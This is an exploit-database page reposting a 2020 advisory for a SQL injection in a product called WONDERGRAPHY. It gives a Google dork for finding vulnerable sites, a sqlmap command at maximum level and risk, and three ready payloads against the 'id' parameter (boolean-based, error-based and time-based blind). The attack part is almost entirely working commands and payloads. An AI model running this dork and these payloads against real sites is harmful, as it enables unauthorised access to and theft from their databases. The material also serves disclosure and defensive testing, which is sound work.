Looking for a fix? Check your Codebase security with multiple scanners from

Edit Report

Our sensors found this exploit at:

Below is a copy:

WONDERGRAPHY - SQL Injection vulnerability
#Exploit Title: WONDERGRAPHY - SQL Injection vulnerability
#Date: 2020-10-21
#Exploit Author: Mahdi Karimi
#Vendor Homepage:
#Google Dork: "Powered by Wondergraphy"
#Tested On: windows 10

sqlmap -u "" --level=5 --risk=3 --dbs --random-agent
Testing Method;
- boolean-based blind
- time-based blind
- error-based

Parameter: id (GET)

    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: id=-1333' OR 3744=3744 AND 'hYml'='hYml

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=157' AND GTID_SUBSET(CONCAT(0x7178717871,(SELECT (ELT(9526=9526,1))),0x71786a7071),9526) AND 'bsqP'='bsqP

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=157' AND (SELECT 1863 FROM (SELECT(SLEEP(5)))Zsyw) AND 'rNlr'='rNlr

#Discovered by: Mahdi Karimi
#Email : [email protected]

Copyright ©2020 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.